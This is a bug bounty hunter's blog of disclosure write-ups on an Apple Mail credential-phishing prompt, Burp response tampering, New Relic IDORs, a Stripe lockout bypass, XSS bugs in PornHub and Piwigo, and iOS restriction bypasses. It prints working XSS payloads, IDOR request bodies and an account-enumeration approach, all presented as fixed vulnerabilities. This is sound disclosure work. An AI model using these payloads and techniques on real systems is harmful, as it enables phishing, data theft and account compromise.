Security and Bug Hunting

Just another security blog - by Jon Bottarini

Don’t Reply: A Clever Phishing Method In Apple’s Mail App

About four or five years ago, friend and fellow bug bounty hunter Sam Curry asked if I had “ever thought about what was possible to load inside an <img> tag, besides an image“. What a peculiar question. I didn’t really understand what he was asking, and I assume Sam got bored of me guessing the wrong answers, so he sent a simple payload that looked like this:

<img src=></img>

At the surface, this appears to be a normal HTML <img> element, until you look a bit closer and realize that the src= parameter is not pointing to an image at all, but rather a webpage ending in .php. If you navigate to this page directly, you’ll be prompted with something that looks like this:

What you’re looking at is an implementation of WWW-Authenticate. In 2017, if you were to embed this <img> payload in an HTML editor on a 3rd party website, nearly anyone who viewed the page with the rendered <img> tag would see an authentication prompt, asking you to sign in to my site. It looked like this:

A prompt asking users on an AirBnb community website to login to my website

Simply incredible. I don’t think Sam realized at the time what he was sitting on in the world of bug bounty – this was essentially a lazy way to phish users on forums, help centers, etc – anywhere that you could enter an image tag. It was unique because in situations where you were allowed to insert an <img> tag but not able to pop an XSS payload (due to CSP or other protections in place), rarely did an application prevent you from loading an external “image” that was really my malicious WWW-Authenticate page. Remember: this was 2017, a lot has changed since then.

After sharing this revelation with Sam, we reported instances of sites vulnerable this issue to a few bug bounty programs, and it was largely hit or miss. Some programs (Yahoo!, if I remember correctly, back before they rebranded their program to Oath, and then to Verizon Media¹) paid $1,000 for each instance of the issue – other programs didn’t pay anything at all, and stated that it was a browser issue. This is understandable – in a way, this issue could be fixed by the browser. The Chrome team decided to fix this outright back in 2013 by preventing cross-origin authentication prompts to image resources. Sam petitioned Mozilla to do the same in 2017, which they (begrudgingly) implemented the change to disallow loading external WWW-Authenticate prompts via image somewhere around Firefox Version 57. Apple never responded to us when we reached out to inform them that Safari was the last (major) browser to suffer from this.

The Problem in Apple Mail

I got bored with the 50/50 odds of getting a bounty through the web programs we were reporting to. A few months passed and I had an epiphany – in the form of a spam email. In short, an email evaded my spam filter because the email had no content besides a photo. Just a big, massive JPG image. This led to an idea – what if I sent a “photo” that was behind a WWW-Authenticate response header in an email? What type of prompt would the recipient see? Would they see any anything at all?

It doesn’t work. Simply put, I am not sure why it doesn’t work when the recipient receives the email – but the prompt does appear when replying to the email. When you reply to an email with that <img> payload I mentioned above, the user is presented with this prompt, which asks them to enter their name and password “to view this page”:

This prompt poses a two-fold problem. This first being that users are already familiar with entering their username and password in ambiguous and confusing prompts on Apple devices – Apple keychain being a major offender.

But this is not a keychain prompt – when a user enters their username and password in this prompt, their credentials are sent directly to my server.

The second problem is that it’s possible to customize the message displayed underneath the URL – in the example above, I put “You need to enter your Apple Mail password again!”. This is made possible through the realm directive:


A string describing a protected area. A realm allows a server to partition up the areas it protects (if supported by a scheme that allows such partitioning), and informs users about which particular username/password are required. If no realm is specified, clients often display a formatted hostname instead.

Mozilla developer portal

All in all – you get a very clever Apple Mail phishing method. Now – a savvy person would realize that “” has nothing to do with Apple, and would probably be skeptical of entering a username and password in the prompt – but official-sounding Apple domain names are cheap!

This issue affected versions of Apple Mail from macOS High Sierra 10.13 to macOS Big Sur 11.2. Yes, you read that right – it took multiple operating systems and four years to fix this issue completely. But before you get out the pitchforks – it’s not entirely Apple’s fault it took so long – there was a two year period where both Apple and myself thought the issue was fixed – when it really wasn’t.


  • Sometime mid to late 2017 (email comms are a bit messy here) – reported issue to Apple
  • Oct 2017 – Apple can’t reproduce the issue, I reply with additional info
  • Nov 2017 – More back and forth, explaining to Apple that the issue only occurs when replying/forwarding the email
  • Sometime in 2018 – Apple states this issue is not eligible for a CVE 🙁
  • July 2018 – Apple states they fixed the issue in macOS High Sierra 10.13 and macOS High Sierra 10.13.2
  • May 2020 – I start to write this blog post, but when I test the old proof of concepts, I notice that the payload is not fully fixed on macOS Catalina 10.15.4 and I am still getting the prompt. Replied back to Apple with proof that the issue still exists.
  • October 2020 – Apple states they have fixed the issue again – I find a bypass pretty quickly (by sending a email with an embedded image loaded inside a pre-made feature in Apple mail called “email templates”). Apple continues work on the remediation.
  • April 2021 – I follow up asking for a status update. Apple states the issue has been resolved in macOS Big Sur 11.2
  • August 2021 – Apple sends me an email out of the blue stating that the issue is eligible for a $5,000 bounty (w0w!)
  • December 2021 – Bounty paid + this writeup is disclosed.

¹ – At time of writing, Verizon Media has rebranded back to Yahoo. We have come full circle.

Very special thanks to Sam Curry (@samwcyo) and Tanner (@itscachemoney) for reviewing a draft of this post.

Follow me on Twitter to stay up to date with my latest bugs + bug bounty finds.

Using Burp Suite match and replace settings to escalate your user privileges and find hidden features

On May 14th, Lew Cirne, the CEO of New Relic, announced a new platform called New Relic One. The platform, featuring a fresh new design and better data visualizations, came as a surprise to investors and New Relic users alike.

But it did not come as a surprise to me, for I had found out about it months prior, using a common trick that I’ve used multiple times in other bug bounty programs to access unreleased beta and admin features; the Burp Suite match and replace rule.

The concept is simple: By changing the server response body from “false” to “true” (I cheekily refer to this as the FALSE2TRUE trick, because everything has to have a catchy name nowadays 😏) – you open up much more on the client side that might previously be hidden or unaccessible, and that’s exactly what happened when I found out about New Relic One. This is not a secret, and has been a method for a long time.

For those of you new to using the Burp Suite match and replace rule, this article goes deeper into where to find it in Burp and how to use it – but it lives under the Proxy settings in Options:

The match and replace rule goes well beyond just changing false responses to true – it can also be used for privilege escalation to change your user permissions from “User” to “Admin”. Let’s use the following example:

Imagine the server performs a check of the permissions of the user with the current session. The request to the server might look something like this:

POST /api/getUserDetails HTTP/1.1
Cookie: mycookies


And the response might look like this:

HTTP/1.1 200 OK


In the response, the client operates under the assumption that the user is in “READONLY” mode, and has a “BASIC” subscription. If we add a match and replace rule to change the “userLevel”:READONLY response to “userLevel”:ADMIN, we can trick the client to display UI elements that are meant only for Administrators:

We can go one step further and display UI elements that are meant only for a “Professional” level subscription as well:

If we were to add the match/replace rules above, the response to the client will now look like this:

HTTP/1.1 200 OK


@daeken has another nifty trick with the Burp match/replace rule: injecting payloads into forms instead of typing out the entire payload:

Back to New Relic. I was using the FALSE2TRUE trick when I realized that there was a feature flag on my account which was always returning false. By simply changing this response to true using Burp match/replace rule, I noticed that there was additional UI elements that appeared on the page.

This is the New Relic landing page when logging in without FALSE2TRUE:

Now, when using the FALSE2TRUE trick, changing all “false” values to “true”:

Bug found!

The Burp match and replace rule gave me access to a completely unreleased feature with a ton of new functionality, where I found other bugs as well, prior to the public release.

A word of warning: Be careful when using the FALSE2TRICK on big websites, because you can really mess up your session, or even your entire account.

I’m curious how you use the match/replace tool in your Burp projects – leave a comment below or ping me on Twitter if you would like to share. If it’s a really good tip, I’ll put it in this post so others can learn!

Until next time 👋

(The New Relic security team reviewed this post in full before it was published and have agreed to let me use one of my reports as an example. I am especially grateful for the New Relic team to be so open and accepting of using their program and bugs I’ve found in examples on my blog).

Get as image function pulls any Insights/NRQL data from any New Relic account (IDOR)

This writeup walks you through the full process as to how I found a pretty bad Insecure Direct Object Reference (IDOR) in New Relic. 

In New Relic, there is the ability to add a 3rd party integration to a product line called New Relic Infrastructure. Common integrations include AWS, Azure, and most recently Google Cloud Platform (GCP). In Google Cloud Platform there is also the ability to create dashboards:

new relic dashboards

Dashboards are pretty common in New Relic, but there was something unique about the dashboards that are within the integrations section; the dropdown options for each chart allow you to do the following actions, which are not present in any of the other dashboard areas:

The option that immediately stood out to me was the “Get as image” option. This option converts the NRQL query that generates the dashboard into an image – and this is where the vulnerability lies. For more info on the New Relic Query Language (NRQL) works, check out this link:

The normal POST request to generate the dashboard image is as follows:

{"query":{"account_id":1523936,"nrql":"SELECT count(*) FROM IntegrationError FACET dataSourceName SINCE 1 DAY AGO"},"account_id":1523936,"endpoint":"/v2/nrql","title":"Authentication Errors"}

The application failed to check and see if the account_id parameter belonged to the user making the request. The account number 1523936 belongs to me, but if I changed it to another number, I could pull data from another account.

So now that I had control over this value, I could change the account ID to any other account ID on New Relic. Since the account ID parameter is incremental, if I was malicious I could simply throw this request into Burp Intruder and highlight the account id value to increment by one on each request, enabling me to pull any data I wanted from any or all accounts on New Relic. The NRQL query could be modified as well, so instead of pulling the data that generated the original dashboard, I could instead change the request to something like this:

{"query":{"account_id":any_account_number_here,"nrql":"SELECT * FROM SystemSample"},"account_id":any_account_number_here,"endpoint":"/v2/nrql","title":"Uh oh!"}

This query runs the SystemSample NRQL query on any account ID, which downloads the following photo:

So this is interesting, but it doesn’t really tell me any juicy info. I know that I’m hitting other accounts, but the information I’m retrieving back is useless – it just shows an empty chart! I played around with this for a little while, trying different NRQL queries until I discovered an interesting header that is in the response back from the server when you send this type of request:


I realized that if you add ?type= at the end of the URL it will show you different chart types, allowing you to exfiltrate more data than normal. If you enter a incorrect “?type=” value, it will show you all of the available chart options within the error message:

{"code":"BadRequestError","message":"uhoh is not a valid Vizco chart type. Permitted Types: apdex area bar baseline billboard bullet empty event-feed funnel heatmap histogram json line markdown pie stacked-horizontal-bar scatter table traffic-light vertical-bar"}

Now I can use any of the above chart types of return more information than I normally would from the NRQL query:


Now we’re getting somewhere! Instead of the normal chart type, I’m now returning a JSON dump of the dashboard, downloaded as a photo. This is pretty great considering I can perform this JSON dump against any account – but I want to go one step further. How can I exfiltrate as much data as possible in each request? Just add a &height=2000 at the end of the URL 🙂


I reported this to the New Relic team and they fixed it shortly afterwards within a few days. I was awarded $2,500 for this bug. I asked them if they wanted to include any comment on this post about how they fixed the issue, and they provided the following:

For some background, this report helped us identify a logic error with the validation code we have in place in our backend authentication proxy. A very specific combination of configuration options for an application would result in the validation checks not taking place.

Once we identified that issue, we were able to search for anywhere we were using that combination of configuration options to quickly mitigate the issue. That then led to a permanent fix of the logic issue, ensuring that the account validation always took place before the request was allowed to proceed.

The New Relic security team is one of the best ones out there – they award quickly and their time to resolution is fantastic. It’s really one of the main reasons I enjoy hunting for bugs on them so much!

Follow me on Twitter to stay up to date with what I’m working on and security/bug bounties in general 🙂

Abusing internal API to achieve IDOR in New Relic

I recently found a nice insecure direct object reference (IDOR) in New Relic which allowed me to pull data from other user accounts, and I thought it was worthy of writing up because it might make you think twice about the types (and the sheer number!) of API’s that are used in popular web services.

New Relic has a private bug bounty program (I was given permission to talk about it here), and I’ve been on their program for quite some time, so I’ve become very familiar with their overall setup and functionality of the application, but this bug took me a long time to find … and you’ll see why below.

Some background first: New Relic has a public REST API which can be used by anyone with a standard user account . This API operates by passing the X-api-key header along with your query. Here’s an example of a typical API call:

curl -X GET '{application_id}/hosts.json' \
     -H 'X-Api-Key:{api_key}' -i

Pretty typical. I tried to poke at this a little bit by swapping the {application_id} with another user account’s {application_id} that belongs to me. I usually test for IDOR’s this way, by having one browser (Usually Chrome) setup as my “victim account” and another browser (usually Firefox) as the “attacker” account, where I route everything through Burp and check the responses after I change values here and there. It’s kind of an old school way to test for IDOR’s and permission structure issues, and there is probably a much more effective way to automate something like this, but it works for me. Needless to say this was a dead end, and it didn’t return anything fruitful.

I looked further and found that New Relic also implements an internal API which occurs on both their infrastructure product and their alerts product. They conveniently identify this through the /internal_api/ endpoint (and put references to their internal API in some of their .js files as well).

The two products operate on different subdomains, and This is what it looks like in Burp, on the domain (where the IDOR originally occurred).

The reason I bring up the fact there are two separate subdomains is because this bug sat there for an excessive amount of time because I didn’t bother checking both subdomains and their respective internal API’s. To make it even more difficult, there are multiple versions of the internal_api, and the bug only worked on version 1. Here’s what the vulnerable endpoint looked like:{ACCOUNT NUMBER}/incidents

The account number increases by 1 every time a new account is created, so I could have literally enumerated every single account pretty easily by just running an intruder attack and increasing the value by one each time. The IDOR was possible because the application did not ensure that the account number being requested through the above internal API GET request matched the account number of the authenticated user. 

This IDOR allowed me to view the following from any New Relic account:

  • Account Events
  • Account Messages
  • Violations (Through NR Alerts)
  • Policy Summaries
  • Infrastructure events and filters
  • Account Settings

This bug has been resolved and I was rewarded $1,000. I’d just like to point out that the New Relic engineering and development team was super quick to remediate this. Special thanks to the New Relic team for running one of, if not the best bug bounty programs out there!

Follow me on Twitter to stay up to date with what I’m working on and security/bug bounties in general 🙂


Inspect Element leads to Stripe Account Lockout Authentication Bypass

A common thing I see happening with many popular applications is that a developer will disable an HTML element through the “class” attribute. It usually looks something like this:

<a href="#" name="disabled_button" class="button small grey disabled">

This works pretty well in some situations, but in other situations it can be manipulated to perform actions that really shouldn’t be done by an unauthenticated user. That’s exactly what happened in a bug I submitted to Stripe a few weeks ago.

When you are logged into your Stripe account, you will be timed out after a certain amount of inactivity. Once this you reach this timeout, you aren’t able to make any changes on the account or view other pages until you re-authenticate by entering your password. Herein lies the problem with using a “disabled” class tag – an attacker can simply manipulate the page through inspect element to allow them to delete the disable class tag and view other pages, allowing them to send requests.

In this video below, you’ll see how I’m locked out of a Stripe account because of inactivity, but by navigating to the “invite user” section of the timeout page through inspect element, I am able to invite myself as an administrator on the account that is timed out, without authenticating first.

This, of course, requires a person to first be logged in to their Stripe account and leave their computer out in the open… but using this method you can render the entire lockout process completely useless on a account. It’s interesting nonetheless that the folks at Stripe made sure that a malicious user couldn’t change the web hooks… but inviting an administrator to the account is completely allowed.

Stripe followed up and clarified by saying that simply dismissing the entire modal isn’t enough to bypass the authentication check, it is instead checked at the backend, but that check was accidentally removed in this situation which allowed me to invite another administrator.

Stripe security was very responsive in resolving this issue and it was fixed shortly after I reported it. I asked permission before publishing this article. Bounty: $500.

I have some more bounty writeups that are a bit more technical than this one coming soon, including a writeup on a CVE I discovered, so check back later for more updates. Additionally, you can follow me on Twitter to stay up to date with my bugs and what I’m doing, if you wish.

Penetrating PornHub – XSS vulns galore (plus a cool shirt!)

When PornHub launched their public bug bounty program, I was pretty sure that most of the low hanging fruits of vulnerabilities would be taken care of and already reported. When I first started poking around, I found my first vulnerability in less than 15 minutes. The second vulnerability was found a few minutes afterward. I have never in my entire bug hunting career found bugs this quickly, so it was pretty exciting.

In return, I received two payments of $250 and a really really cool T-Shirt + stickers that I posted on Reddit here:

When I posted this on Reddit I had no idea it would be so popular and raise so many questions. Most people asked “What was the hack?” followed by “Why would you hack PornHub?” and I couldn’t talk about it until…now. (These vulnerabilities have now been fixed.)

I found and reported two reflected cross-site scripting (XSS) vulnerabilities within 20 minutes of browsing the PornHub Premium website. Cross site scripting, if you don’t know what that is, is a type of vulnerability that enables an attacker to run dangerous scripts on a website. OWASP sums it up pretty nicely here:

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

The first one was found using the “redeem code” section of the site – it didn’t check to see if the code being entered in the text input for the redeem code was an actual payload, so I was able to use the following payload to reflect the script on the page:

PAYLOAD+STACK++%3E%27" /Autof<K>ocus /O<K>nfocus=confirm`1`//&error=1

The first part of the payload “PAYLOAD STACK” ensures that the rest of the payload is sent through. If I entered:

++%3E%27" /Autof<K>ocus /O<K>nfocus=confirm`1`//&error=1

Without the words in front of it, the application would reject it and nothing would appear on the page. Entering something non-malicious to begin would trick the validator, and in turn, allow the payload to execute.

The second vulnerability was also a XSS. This was was a bit simpler, and was found by entering a payload in a URL parameter that only appears once to new users… which is why I think it wasn’t found until now – most bug hunters like to get a feel of a website before they start poking around and trying to get things to break, but usually I take the different approach and use incognito windows so that the website thinks it’s the first time I’ve ever visited the site before. This is where the vulnerability existed.

I noticed that the PornHub Premium site was mostly off-limits unless you paid to access it. Before you could even pay, there is a “pop-up” window that displays to the user that they are going to be viewing pornography and to either enter or exit by clicking on a button. What I also noticed is that once you selected “enter”, there was a part of the URL that changed and added a parameter. This vulnerable parameter was &compliancePop=no_gateway  – this is where I was able to enter:


And I got a really nice “1” to appear on the screen, which shows evidence of cross-site scripting. I reported both of these vulnerabilities to PornHub and they were triaged within 24 hours.

I’d like to thank the folks at PornHub for running such a fair, quick responding program and keeping their users safe. Also – thanks for the amazing T-Shirt! Thanks also to the folks at Reddit for being so interested in this that I had to send over 200 pm’s to people who wanted to know what I did…hopefully this lives up to the promise that I would tell you about it, and sorry it took so long.

I have other bugs and vulnerabilities that are cooler and more intense than this one coming soon, so check back later and I’ll share them with you. Additionally, you can follow me on Twitter to stay up to date with my bugs and what I’m doing, if you wish.

Discovering a stored XSS that affects over 900k websites (CVE-2016-9751)

In my free time when I’m not hunting for bugs in paid programs, I like to contribute a bit to the open-source community and check for vulnerabilities that might arise. In doing so, I found a stored cross-site scripting vulnerability that affected over 900,000 websites… yikes.

The vulnerable application is called Piwigo  – an open source image showcase/album that, according to Google, is active on over 900,000 webpages. The true number is probably higher than that, but that’s just what the original search brings up. It’s commonly a one-click install on many web host platform for image showcases. Anyhow – on to the bug:

Piwigo has an option that allows for a “quick search” of the photo gallery. (Important to note: There are different “themes” that a visitor can choose that changes the way the pictures are displayed and the way the page looks, this will be important to remember later.)

When you enter a payload, the page displays the payload (sanitized properly) – and then saves the search as a number inside the URL. For example, my search URL is:

That number at the end can be changed, so you can see what other keywords people have searched on the site. I’m not sure if this is a good or a bad idea, but that’s not the bug.

The bug is that when you enter a payload in this quick search area and have also selected the elegant theme there is the option to open a “search criteria” page.

It just so happens that on this search rules page… the keywords (or payload) you entered earlier are not sanitized. You end up getting this beautiful pop-up that all of us bug-hunters love to see:

Sidenote: If you’re a bug bounty hunter, it’s always best to use alert(document.domain) instead of alert(1) – it tells you if the payload is actually firing on a domain that is in scope for the program.

Now here is where it gets bad… that URL above is permanently stored on your website – and I think the only way to remove it is if you manually purge the search history from the administrator backend. Below is a picture of where you can perform that purge:

Why is this bad? Well, before I reported this bug, I’d be concerned if an attacker kept a variety of payloads that will still execute even after the website has implemented a patch – since the search is stored in the database before the patch went into place, it makes sense that all the attacker needs to do is direct the victim to the old URL – and the website owner can’t do much if they haven’t purged the search history.

Example of what I mean: At the time of this writing, if you visit the above URL in that picture on, the payload will still execute, even though the vulnerability was fixed a long time ago.

I was assigned (my first ever!) CVE-2016-9751 regarding this vulnerability. A fix ( was implemented after reporting. Webmasters and gallery owners should update to Piwigo 2.9 in order to implement the patch.

Payload used:

"x><img src=a onerror=alert(1)>


Bypassing Apple’s iOS 10 Restrictions Settings – Twice

By default, Apple has a feature that allows all of their iOS devices to be assigned restrictions, so that employees and mostly children cannot access naughty websites and other types of less-desirable content. You can enable these settings by visiting Settings > General > Restrictions on your iPhone or iPad.

Around the beginning of every year I try to break Apple’s restrictions settings for websites. It’s a pretty nerdy thing to do and its not really classified as a “vulnerability” – but it’s a fun challenge and leads to some pretty interesting bugs, so I wanted to talk about a few of them here:

When I test the restriction settings, I turn restrictions on, and then I change the website settings to allow Safari, but only the default specific websites (see screenshot below).

The first time I found out how to bypass the restrictions, I did it on accident. I noticed that there were certain pages I had open previously in Safari that, when restrictions were turned on, I was still able to reload even though the domains were not on the list of approved websites. I realized that all these pages I had open had one thing in common: they were all displaying PDF’s. So now, by simply appending .pdf at the end of the Safari URL, it was possible to visit any website. An example is below:

Restricted URL: (left image)

Allowed URL: (right image)

That one was pretty interesting. I reported it to Apple through their bug tracker and it was marked as a duplicate  – looks like someone else had found it before me. I tried again to see if it was possible through another method, and after a few hours I discovered another way:

(The following is my assumptions as to how the website restrictions work behind the scenes) When Apple checks a URL, they check the structure of the URL to see if it matches the list of whitelisted domains. What doesn’t happen is an additional check to ensure that the URL actually ends… or if it contains subdomains that match a whitelisted domain. This may be hard to explain so I made a photo to demonstrate:

See what’s happening here? Only the URL up to “.com” is checked against the whitelist. The restrictions settings do not check to see if a URL contains subdomains… so I’m able to trick the filter to allowing a domain such as “” to be let through. The actual domain name in this case is – which is definitely not on my approved list of domains.

Restricted URL: (left image)

Allowed URL (but shouldn’t be!): (right image)

I also reported this to Apple about 7 months ago and it still isn’t fixed. I asked them for permission to share this article.

This is just an interesting bug that slipped through the cracks, I assume they will have a fix out eventually for the bugs. Still haven’t made it in the Security HoF for Apple yet, but it’s definitely a goal of mine for the year.

I have other bugs and vulnerabilities that are cooler and more intense than this one coming soon, so check back later and I’ll share them with you. Additionally, you can follow me on Twitter to stay up to date with my bugs and what I’m doing, if you wish.